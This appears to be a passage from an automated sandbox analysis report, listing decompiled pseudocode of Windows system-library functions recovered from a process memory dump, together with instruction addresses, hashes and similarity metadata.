                                                                                                                                                    0x030f1dd6
                                                                                                                                                    0x030f1ddf
                                                                                                                                                    0x030f1de0
                                                                                                                                                    0x030f1de1
                                                                                                                                                    0x030f1de5
                                                                                                                                                    0x030f1de8
                                                                                                                                                    0x030f1def
                                                                                                                                                    0x030f1df0
                                                                                                                                                    0x030f1df6
                                                                                                                                                    0x030f1df7
                                                                                                                                                    0x030f1dfe
                                                                                                                                                    0x030f1e1a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f1e0b
                                                                                                                                                    0x030f1e12
                                                                                                                                                    0x030f1e12
                                                                                                                                                    0x030f1e00
                                                                                                                                                    0x030f1e00
                                                                                                                                                    0x030f1e05
                                                                                                                                                    0x030f1e1e
                                                                                                                                                    0x030f1e23
                                                                                                                                                    0x0313570f
                                                                                                                                                    0x03135713
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135719
                                                                                                                                                    0x03135719
                                                                                                                                                    0x030f1e2c
                                                                                                                                                    0x030f1e2d
                                                                                                                                                    0x030f1e2e
                                                                                                                                                    0x030f1e2f
                                                                                                                                                    0x030f1e31
                                                                                                                                                    0x030f1e32
                                                                                                                                                    0x030f1e35
                                                                                                                                                    0x030f1e3d
                                                                                                                                                    0x03135723
                                                                                                                                                    0x0313573d
                                                                                                                                                    0x0313573d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135723
                                                                                                                                                    0x030f1e49
                                                                                                                                                    0x030f1e4e
                                                                                                                                                    0x030f1e4e
                                                                                                                                                    0x030f1e09
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                                                    • Instruction ID: b9a1d0e5c2566506512909cddf293e671be7b77935dbc3c1f4f4f258d6a7fba3
                                                                                                                                                    • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                                                    • Instruction Fuzzy Hash: 72218D76601219EFC725CF59C880FAABBBDEF89644F154055EA019B610D670AE01CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030E0050, Relevance: .1, Instructions: 81COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                    			E030E0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x31bd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E030F9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0310B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E03198A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E030F9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x31bb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                                                                                    0x030e0055
                                                                                                                                                    0x030e005d
                                                                                                                                                    0x030e0062
                                                                                                                                                    0x030e006c
                                                                                                                                                    0x030e006f
                                                                                                                                                    0x030e0074
                                                                                                                                                    0x030e007a
                                                                                                                                                    0x030e007a
                                                                                                                                                    0x030e0080
                                                                                                                                                    0x030e0080
                                                                                                                                                    0x030e0087
                                                                                                                                                    0x030e008d
                                                                                                                                                    0x030e008f
                                                                                                                                                    0x030e0093
                                                                                                                                                    0x030e0095
                                                                                                                                                    0x030e009b
                                                                                                                                                    0x030e00f8
                                                                                                                                                    0x030e00fb
                                                                                                                                                    0x030e00fc
                                                                                                                                                    0x030e00ff
                                                                                                                                                    0x030e0108
                                                                                                                                                    0x030e0108
                                                                                                                                                    0x030e00a2
                                                                                                                                                    0x030e00a6
                                                                                                                                                    0x030e00b3
                                                                                                                                                    0x030e00bc
                                                                                                                                                    0x030e00c5
                                                                                                                                                    0x030e00ca
                                                                                                                                                    0x0312c01e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312c02d
                                                                                                                                                    0x030e00d5
                                                                                                                                                    0x030e00d9
                                                                                                                                                    0x0312c03d
                                                                                                                                                    0x0312c046
                                                                                                                                                    0x0312c046
                                                                                                                                                    0x030e00df
                                                                                                                                                    0x030e00e2
                                                                                                                                                    0x030e00ea
                                                                                                                                                    0x030e00ef
                                                                                                                                                    0x030e00f2
                                                                                                                                                    0x030e00f6
                                                                                                                                                    0x030e0111
                                                                                                                                                    0x030e0117
                                                                                                                                                    0x030e0117
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e00f6
                                                                                                                                                    0x030e00d0
                                                                                                                                                    0x030e00d0
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9f1ec55e325adb33dfff7675d830020605e4eb3c0570c5b0b418d47a187c097a
                                                                                                                                                    • Instruction ID: 0a59c7e215c748d7f5d934bd15bf573d9bdb6db3f2909e8bfb7a645a07714ad8
                                                                                                                                                    • Opcode Fuzzy Hash: 9f1ec55e325adb33dfff7675d830020605e4eb3c0570c5b0b418d47a187c097a
                                                                                                                                                    • Instruction Fuzzy Hash: 7B319135302B04CFD725CF29C840B9AB7E5FF88715F18896DE5968BB90EB75A801CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03146C0A, Relevance: .1, Instructions: 79COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                    			E03146C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E030E7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x31b7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L030E4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0310F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E030E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03109AE0();
						_t23 = L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                                                                                    0x03146c0a
                                                                                                                                                    0x03146c0f
                                                                                                                                                    0x03146c10
                                                                                                                                                    0x03146c13
                                                                                                                                                    0x03146c15
                                                                                                                                                    0x03146c19
                                                                                                                                                    0x03146c1c
                                                                                                                                                    0x03146c21
                                                                                                                                                    0x03146c28
                                                                                                                                                    0x03146c3a
                                                                                                                                                    0x03146c2a
                                                                                                                                                    0x03146c33
                                                                                                                                                    0x03146c33
                                                                                                                                                    0x03146c3f
                                                                                                                                                    0x03146c48
                                                                                                                                                    0x03146c4d
                                                                                                                                                    0x03146c60
                                                                                                                                                    0x03146c65
                                                                                                                                                    0x03146c69
                                                                                                                                                    0x03146c73
                                                                                                                                                    0x03146c79
                                                                                                                                                    0x03146c7f
                                                                                                                                                    0x03146c86
                                                                                                                                                    0x03146c90
                                                                                                                                                    0x03146c94
                                                                                                                                                    0x03146ca6
                                                                                                                                                    0x03146cb2
                                                                                                                                                    0x03146cbd
                                                                                                                                                    0x03146cbd
                                                                                                                                                    0x03146cc3
                                                                                                                                                    0x03146cc7
                                                                                                                                                    0x03146ccb
                                                                                                                                                    0x03146cd0
                                                                                                                                                    0x03146cd1
                                                                                                                                                    0x03146ce2
                                                                                                                                                    0x03146ce2
                                                                                                                                                    0x03146c69
                                                                                                                                                    0x03146ced

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bf1e3dbbb9df8e3a955a6ccd8e953660771f4e273aa1640d8cb5f650f816301b
                                                                                                                                                    • Instruction ID: ed39f94c5a31060e340884b9959fc742f660c2c6e29fffe0a1e292ac8bdefca9
                                                                                                                                                    • Opcode Fuzzy Hash: bf1e3dbbb9df8e3a955a6ccd8e953660771f4e273aa1640d8cb5f650f816301b
                                                                                                                                                    • Instruction Fuzzy Hash: A52197B5A00644AFC715DB68D880E6AB7B8FF48704F084069F808DB7A1E734E950CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031090AF, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E031090AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0311D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E030FE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L030E4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0310F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E030FA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                                                                                    0x031090af
                                                                                                                                                    0x031090b8
                                                                                                                                                    0x031090bb
                                                                                                                                                    0x031090bf
                                                                                                                                                    0x031090c2
                                                                                                                                                    0x031090c2
                                                                                                                                                    0x031090c8
                                                                                                                                                    0x031090cb
                                                                                                                                                    0x031090cd
                                                                                                                                                    0x031414d7
                                                                                                                                                    0x031414eb
                                                                                                                                                    0x031414eb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031414eb
                                                                                                                                                    0x031414db
                                                                                                                                                    0x031414e6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031414f2
                                                                                                                                                    0x031414e8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031414e8
                                                                                                                                                    0x031090d8
                                                                                                                                                    0x031090da
                                                                                                                                                    0x031090dd
                                                                                                                                                    0x031090e5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03109139
                                                                                                                                                    0x031090fa
                                                                                                                                                    0x031090fe
                                                                                                                                                    0x03109142
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03109142
                                                                                                                                                    0x03109104
                                                                                                                                                    0x03109107
                                                                                                                                                    0x0310910b
                                                                                                                                                    0x03109110
                                                                                                                                                    0x03109118
                                                                                                                                                    0x03109147
                                                                                                                                                    0x03109148
                                                                                                                                                    0x0310914f
                                                                                                                                                    0x03109150
                                                                                                                                                    0x03109151
                                                                                                                                                    0x03109152
                                                                                                                                                    0x03109156
                                                                                                                                                    0x0310915d
                                                                                                                                                    0x03109160
                                                                                                                                                    0x03109168
                                                                                                                                                    0x0310916c
                                                                                                                                                    0x031091bc
                                                                                                                                                    0x031091be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031091be
                                                                                                                                                    0x0310916e
                                                                                                                                                    0x03109173
                                                                                                                                                    0x03109176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0310917c
                                                                                                                                                    0x03109180
                                                                                                                                                    0x031091b5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031091b5
                                                                                                                                                    0x03109182
                                                                                                                                                    0x03109185
                                                                                                                                                    0x03109189
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0310918e
                                                                                                                                                    0x03109190
                                                                                                                                                    0x03109198
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031091a0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031091ad
                                                                                                                                                    0x031091ad
                                                                                                                                                    0x031091b0
                                                                                                                                                    0x031091b1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03109185
                                                                                                                                                    0x0310911a
                                                                                                                                                    0x0310911c
                                                                                                                                                    0x0310911f
                                                                                                                                                    0x03109125
                                                                                                                                                    0x03109127
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                                    • Instruction ID: c81fb6664dc32d389199ee09d9e89978365f1fec8703d7b3279b9293a4d0545a
                                                                                                                                                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                                    • Instruction Fuzzy Hash: 22218075A00304EFDB20DF59D844AAAF7F8EB48320F19887AE945AB251D3B0ED40CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F3B7A, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                                    			E030F3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x31b84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x31b84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L030E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x31b84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0310AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0310FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x31b84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x31b84c4; // 0x0
					L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                                                                                                    0x030f3b89
                                                                                                                                                    0x030f3b96
                                                                                                                                                    0x030f3ba1
                                                                                                                                                    0x030f3bab
                                                                                                                                                    0x030f3bb5
                                                                                                                                                    0x030f3bb9
                                                                                                                                                    0x03136298
                                                                                                                                                    0x030f3bbf
                                                                                                                                                    0x030f3bc2
                                                                                                                                                    0x030f3bc3
                                                                                                                                                    0x030f3bc9
                                                                                                                                                    0x030f3bca
                                                                                                                                                    0x030f3bcc
                                                                                                                                                    0x030f3bcd
                                                                                                                                                    0x030f3bd4
                                                                                                                                                    0x030f3bd6
                                                                                                                                                    0x030f3bdb
                                                                                                                                                    0x030f3bea
                                                                                                                                                    0x030f3bf7
                                                                                                                                                    0x030f3bfb
                                                                                                                                                    0x030f3bff
                                                                                                                                                    0x030f3c09
                                                                                                                                                    0x030f3c0a
                                                                                                                                                    0x030f3c0b
                                                                                                                                                    0x030f3c0f
                                                                                                                                                    0x030f3c14
                                                                                                                                                    0x030f3c18
                                                                                                                                                    0x030f3c18
                                                                                                                                                    0x030f3bfb
                                                                                                                                                    0x030f3c1b
                                                                                                                                                    0x030f3c30
                                                                                                                                                    0x030f3c30
                                                                                                                                                    0x030f3c3d

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 01c8fc6c4860a64859a3401b23df5ac93ec697c80802b5ddd3114bb8f0eb98b0
                                                                                                                                                    • Instruction ID: f68f84b29d81c45a8176fb93720c9436d4095252f6cbc4cf1530b38bea82c89a
                                                                                                                                                    • Opcode Fuzzy Hash: 01c8fc6c4860a64859a3401b23df5ac93ec697c80802b5ddd3114bb8f0eb98b0
                                                                                                                                                    • Instruction Fuzzy Hash: AC219F76B01208AFC704EF98CD81B5AB7BDFB48758F1500A8EA08AB251D371ED51CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03146CF0, Relevance: .1, Instructions: 74COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E03146CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E030E7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E030E7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x30a5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E030FF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E030FF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E03147016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L030E2400( &_v52);
								}
								_t21 = L030E2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                                                                                                    0x03146cfb
                                                                                                                                                    0x03146d00
                                                                                                                                                    0x03146d02
                                                                                                                                                    0x03146d06
                                                                                                                                                    0x03146d0a
                                                                                                                                                    0x03146d0e
                                                                                                                                                    0x03146d19
                                                                                                                                                    0x03146d2b
                                                                                                                                                    0x03146d1b
                                                                                                                                                    0x03146d24
                                                                                                                                                    0x03146d24
                                                                                                                                                    0x03146d33
                                                                                                                                                    0x03146d39
                                                                                                                                                    0x03146d46
                                                                                                                                                    0x03146d4f
                                                                                                                                                    0x03146d61
                                                                                                                                                    0x03146d51
                                                                                                                                                    0x03146d5a
                                                                                                                                                    0x03146d5a
                                                                                                                                                    0x03146d69
                                                                                                                                                    0x03146d6b
                                                                                                                                                    0x03146d6d
                                                                                                                                                    0x03146d6f
                                                                                                                                                    0x03146d6f
                                                                                                                                                    0x03146d74
                                                                                                                                                    0x03146d79
                                                                                                                                                    0x03146d7a
                                                                                                                                                    0x03146d7f
                                                                                                                                                    0x03146d82
                                                                                                                                                    0x03146d88
                                                                                                                                                    0x03146d89
                                                                                                                                                    0x03146d90
                                                                                                                                                    0x03146d94
                                                                                                                                                    0x03146da7
                                                                                                                                                    0x03146db1
                                                                                                                                                    0x03146db1
                                                                                                                                                    0x03146dbb
                                                                                                                                                    0x03146dbb
                                                                                                                                                    0x03146d90
                                                                                                                                                    0x03146d69
                                                                                                                                                    0x03146d46
                                                                                                                                                    0x03146dc6

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 935e68be65f43617d4d3710f0cfb8cd4371a4e60b1cc225135b188c81fd37111
                                                                                                                                                    • Instruction ID: 39de9c0f0df42fe84c60d3e940cfa80d08e1e973ce759192af944899107c9b10
                                                                                                                                                    • Opcode Fuzzy Hash: 935e68be65f43617d4d3710f0cfb8cd4371a4e60b1cc225135b188c81fd37111
                                                                                                                                                    • Instruction Fuzzy Hash: 7321D0725053459FC311EF68CD44BABB7ECAFCA644F080856B9809B250EB34C908C6A2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0319070D, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                    			E0319070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E031907DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0318AFDE( &_v8,  &_v12);
					E03191293(_t38, _v28, _t60);
					if(E030E7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E031814FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                                                                                                    0x0319071b
                                                                                                                                                    0x03190724
                                                                                                                                                    0x03190734
                                                                                                                                                    0x03190738
                                                                                                                                                    0x0319074b
                                                                                                                                                    0x0319074b
                                                                                                                                                    0x03190753
                                                                                                                                                    0x03190753
                                                                                                                                                    0x03190759
                                                                                                                                                    0x0319075d
                                                                                                                                                    0x03190774
                                                                                                                                                    0x03190779
                                                                                                                                                    0x0319077d
                                                                                                                                                    0x03190789
                                                                                                                                                    0x03190795
                                                                                                                                                    0x031907a7
                                                                                                                                                    0x03190797
                                                                                                                                                    0x031907a0
                                                                                                                                                    0x031907a0
                                                                                                                                                    0x031907af
                                                                                                                                                    0x031907c4
                                                                                                                                                    0x031907cd
                                                                                                                                                    0x031907cd
                                                                                                                                                    0x031907af
                                                                                                                                                    0x031907dc

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
